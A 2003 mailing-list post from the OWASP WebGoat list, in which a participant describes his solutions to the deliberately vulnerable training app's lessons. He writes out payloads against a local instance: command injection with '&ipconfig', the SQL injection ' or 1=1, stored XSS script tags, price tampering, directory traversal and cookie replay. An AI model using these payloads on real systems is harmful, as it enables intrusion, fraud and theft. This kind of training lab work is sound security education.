[OWASP-WEBGOAT]WebGoat Walkthru? (May be a spoiler, so if you haven't completed the lessons, you may not want to look at it)

Jeremy Junginger jj at act.com
Wed Nov 19 13:32:30 EST 2003 

Hey guys, this is my first post to the group.  I have been getting familiar
with WebGoat and am about to play with the challenges, but I wanted to make
sure I'm on the right track before I continue.  Thanks!

TOOLS USED:
PenProxy (HTTP Proxy that allows modification of many fields)
Achilles (Another HTTP Proxy that was suggested)
HTTrack (Tool for spidering websites)
FormScalpel (Form manipulation and more)

WALK-THRU?!?:

HTTP BASICS:  I looked at this one for a couple hours before I decided it is
just a 
tutorial on HTTP.  
EXPLOIT: N/A (I may have missed something here)

FAIL OPEN AUTHENTICATION:  This one took forever....the hints led me to
removing the 
password parameter, and "VIEW SOURCE" gave me the author's name "jeff", so I
tried 
jeff with "jeff" first just to see if it worked, and voila, but more
interesting is 
the fact that if you omit the password parameter completely and supply a
valid 
username (in this case, "jeff") it authenticates anyways.
EXPLOIT:
http://127.0.0.1:8080/WebGoat/attack?Username=jeff
or
http://127.0.0.1:8080/WebGoat/attack?Username=jeff&Password=jeff

HTML CLUES:  This was pretty much a gimme.  
<snip>
    FIXME admin:adminpw
</snip>
EXPLOIT:
http://127.0.0.1:8080/WebGoat/attack?Username=admin&Password=adminpw
which also yields:
http://127.0.0.1:8080/WebGoat/attack?Username=jblow&Password=passwd1
that also allows you to log in.

PARAMETER INJECTION:  This one was pretty funny.  It reminded me of the
directory 
traversal/Unicode (ala NIMDA/CR/CR2) exploits.  The &, &&, |, and || can be
used to 
run additional commands that are available in the shell.
EXPLOIT (examples):
http://127.0.0.1:8080/WebGoat/attack?dir=&ipconfig&netstat
or enter the following in the form:
&ipconfig&netstat&ping 127.0.0.1

UNCHECKED EMAIL:  I'm not sure I get this one.  I see that you can send
malicious 
html emails, but didn't find much else.  I used:
EXPLOIT?:
TO:test at test.xom
MESSAGE:<A href="http://www.playboy.com/">http://www.google.com</A> 

SQL INJECTION:  This is a subject I am still pretty new at, but I took a look
at "SQL 
Injection" by Kevin Spett of SPI LABS, which led me to try inserting an
"always true" 
statement (1=1):
EXPLOIT:
Enter an account number:' or 1=1
or
Enter an account number:' or 0=0
:)

THREAD SAFETY:  I used the hints, and saw that if you open the two browsers
(and click fast enough) one users account gets sent to both userids.  Bad
stuff there.  I wouldn't want to see that in production...heheh

WEAK AUTHENTICATION COOKIE:  This one was neat, because it had a little
crypt-o-gram 
type puzzle (jeff/jeff creates the cookie ggfkggfk whereas dave/dave creates
the 
cookie fwbefwbe, they're reversed and incremented by 1 letter).  This didn't
actually 
buy us anything as far as i can tell, except the 'AuthCookie'.  I logged in
with jeff/jeff and upon logging out, I noticed that the cookie had an
'AuthCookie=ggfkggfk' so I put it in the Cookie field of PenProcy and it
worked:
EXPLOIT:
Using PenProxy, I added 'AuthCookie=ggfkggfk;' to the Cookie field
BUT I FOUND THIS TO BE INTERESTING:  I stopped tomcat (java crash) and
reconnected to webgoat, and look what Tomcat threw out...this was actually
kind of funny...
<snip>
Successful connection to null
http8080-Processor4 DROP TABLE user_data
http8080-Processor4 CREATE TABLE user_data (userid varchar(5) not null
primary key,first_name varcha
r(20),last_name varchar(20),cc_number varchar(30),cc_type varchar(10),)
http8080-Processor4 INSERT INTO user_data VALUES
('101','Joe','Blow','987654321','VISA')
http8080-Processor4 INSERT INTO user_data VALUES
('101','Joe','Blow','222200001111','MC')
http8080-Processor4 INSERT INTO user_data VALUES
('102','John','Doe','222200002222','MC')
http8080-Processor4 INSERT INTO user_data VALUES
('102','John','Doe','222200002222','AMEX')
http8080-Processor4 INSERT INTO user_data VALUES
('103','Jane','Plane','123456789','MC')
http8080-Processor4 INSERT INTO user_data VALUES
('103','Jane','Plane','333300003333','AMEX')
http8080-Processor4 DROP TABLE user_system_data
http8080-Processor4 CREATE TABLE user_system_data (userid varchar(5) not null
primary key,user_name
varchar(12),password varchar(10),cookie varchar(30),)
http8080-Processor4 INSERT INTO user_system_data VALUES
('101','jblow','passwd1', '')
http8080-Processor4 INSERT INTO user_system_data VALUES
('102','jdoe','passwd2', '')
http8080-Processor4 INSERT INTO user_system_data VALUES
('103','jplane','passwd3', '')
http8080-Processor4 INSERT INTO user_system_data VALUES ('104','jeff','jeff',
'')
http8080-Processor4 INSERT INTO user_system_data VALUES ('105','dave','dave',
'')
http8080-Processor4 DROP TABLE product_system_data
http8080-Processor4 CREATE TABLE product_system_data (productid varchar(6)
not null primary key,prod
uct_name varchar(20),price varchar(10),)
http8080-Processor4 INSERT INTO product_system_data VALUES ('32226','Dog
Bone','$1.99')
http8080-Processor4 INSERT INTO product_system_data VALUES ('35632','DVD
Player','$214.99')
http8080-Processor4 INSERT INTO product_system_data VALUES ('24569','60 GB
Hard Drive','$149.99')
http8080-Processor4 INSERT INTO product_system_data VALUES ('56970','80 GB
Hard Drive','$179.99')
http8080-Processor4 INSERT INTO product_system_data VALUES ('14365','56 inch
HDTV','$6999.99')
http8080-Processor4 DROP TABLE messages
http8080-Processor4 CREATE TABLE messages (num int not null primary key,title
varchar(50),message va
rchar(1000),)
Success: creating tables.
Successfully refreshed the database.
Wed Nov 19 11:05:08 GMT-07:00 2003 | x.x.x:x.x.x.x | WelcomeScreen |
[Username=jeff,Password=jeff]
</snip>
(Is that cheating?  I think it may be)

DATABASE XSS:  I just tried standard java "alert" messages, and found that if
you put the following in the message field and view it, it runs the code.
EXPLOIT:
Message: <script language="javascript" type="text/javascript">alert("Put
Malware Here");</script>
(Then click on message to view)

HIDDEN FIELD TAMPERING:  I think I'm missing something here.  I saw that you
can just pass the price parameter as any number you want, so I just modified
the price parameter and got a television for .01, what a bargain!
EXPLOIT:
http://10.40.32.111:8080/WebGoat/attack?Price=.01

WEAK ACCESS CONTROL (SHOULD BE DIRECTORY TRAVERSAL?): All I could find on
this one was that it allowed directory traversal.  Pretty much trial and
error on this one.  Anyone find this another way?
EXPLOIT:
Filename:../
or
Filename:../../
grants access to TOP SECRET stuff.

CHALLENGES:  I am getting ready to work on these.  But I wanted to make sure
I haven't overlooked any obvious stuff in the above exercises.  Thanks for
your input on this, and have a great day!

-Jeremy

  


This e-mail message and all attachments transmitted with it may be confidential 
and are intended solely for the addressee(s). If you are not the intended recipient
or the person responsible for delivering it to the intended recipient, you are
hereby notified that any reading, dissemination, distribution, copying, or other 
use of this message or its attachment(s) is strictly prohibited.  If you receive 
this email in error, please immediately notify the sender of the message or 
Best Software, Inc. by e-mailing postmaster at bestsoftware.com and destroy all copies 
of this message.  Best Software, for the protection of our internal systems and 
those of our customers, does block most email attachments.

-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.owasp.org/pipermail/owasp-webgoat/attachments/20031119/dc8448f3/attachment.html

More information about the Owasp-webgoat mailing list